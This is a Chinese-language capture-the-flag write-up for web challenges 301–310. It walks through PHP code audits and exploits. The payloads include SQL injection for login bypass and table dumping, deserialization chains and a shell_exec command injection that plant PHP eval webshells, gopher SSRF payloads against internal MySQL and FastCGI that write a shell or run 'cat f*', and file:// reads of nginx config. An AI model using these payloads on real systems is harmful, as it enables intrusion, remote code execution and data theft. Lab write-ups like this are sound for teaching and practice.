web301
Seay审一下啥也没有,直接上手看
在checklogin.php中
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
sql语句中,username没有过滤而产生的sql注入漏洞
userid=1'union select 1#&userpwd=1
登录成功拿到flag
web302
和上题有一点不一样,在
fun.php
<?php
function sds_decode($str){
return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>
进行了加密,我们也将传入的str加密即可
exp
<?php
$str = 1;
echo md5(md5($str.md5(base64_encode("sds")))."sds");
#d9c77c4e454869d5d8da3b4be79694d3
在checklogin.php
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
和上一题相同
sql语句中,username没有过滤而产生的sql注入漏洞
userid=1'union select d9c77c4e454869d5d8da3b4be79694d3#&userpwd=1
web303
这题限制了username的长度,无法sql注入了
但在dptadd.php中
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
有多个参数可控,且无过滤,可以进行sql注入,但要先登录,在数据库中
INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');
发现了admin和加密后的密码,盲猜是admin,
弱口令登录后,访问dptadd.php,在dptadd.php中可以看出每个字段值都可控,所以我们可以在随便一个地方构造,这样它就会把我们想要查的东西插入到表中,最后我们再在dpt.php查看就可以了
爆表:
dpt_name=5',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
字段:
dpt_name=5',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#
flag:
dpt_name=5',sds_address=(select flag from sds_fl9g)#
web 304
和上题步骤一样
web305
在fun.php
<?php
function sds_decode($str){
return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
return false;
}else{
return true;
}
}
?>
过滤的很死。应该无法sql注入了
在class.php中
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-17 13:20:37
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-17 13:33:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __destruct(){
file_put_contents($this->username, $this->password);
}
}
file_put_contents函数是将字符写入文件中
假如我们把username=<?php @eval(POST_['a']); ?>
,再吧password=1.php,就把一句话木马写入1.php中,
再去找反序列化的地方
在checklogin.php中
if(isset($user_cookie)){
$user = unserialize($user_cookie);
}
exp:
<?php
class user{
public $username;
public $password;
public function __construct(){
$this->username='1.php';
$this->password='<?php eval($_POST[1]);phpinfo();?>';
}
}
$a=new user();
echo urlencode(serialize($a));
O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D
cookie:user=O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D
访问1.php,出现phpinfo()上传成功
用蚁剑练剑数据库,就可以找到flag
web306
在class.php中
在close()方法中有file_put_contents函数可以利用,再去找可以触发close()方法的
在dao.php中
可以通过触发__destruct()来触发close(),反序列化中可以自动触发__destruct()
在index.php中
有unserialize()函数进行反序列化
exp
<?php
class dao{
private $conn;
public function __construct(){
$this->conn=new log();
}
}
class log{
public $title='1.php';
public $info='<?php eval($_POST[1]);?>';
}
echo base64_encode(serialize(new dao()));
web307
Seay扫一下,在dao.php发现了shell_exec
shell_exec函数可以执行脚本
shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
可以改成
rm -rf ./;echo "<?php eval(\$_POST[1]);?>" >a.php; /*
管道符前面报错后会执行后面的命令,所以我们吧$this->config->cache_dir改成我们想要的命令,
两个类再去找反序列化点
exp
<?php
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
class config{
public $cache_dir = ';echo "<?php eval(\$_POST[1]);?>" >a.php;';
}
echo base64_encode(serialize(new dao()));
访问a.php命令执行即可
web308
在fun.php中有个ssrf
再去找哪里调用了
继续找到反序列化的利用点
用gopherus.py生成payload
exp
<?php
class dao{
private $config;
public function __construct(){
$this->config = new config();
}
}
class config{
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}
echo base64_encode(serialize(new dao()));
传入获取flag
web309
和上一题差不多但打的是fastcgi,稍微改一下exp即可
exp
<?php
class dao{
private $config;
public function __construct(){
$this->config = new config();
}
}
class config{
public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
echo base64_encode(serialize(new dao()));
web310
读配置文件
<?php
class config{
public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo (base64_encode(serialize($a)));
?>
访问4476端口
<?php
class config{
public $update_url = 'http://127.0.0.1:4476';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo (base64_encode(serialize($a)));
?>
找找就可以找到flag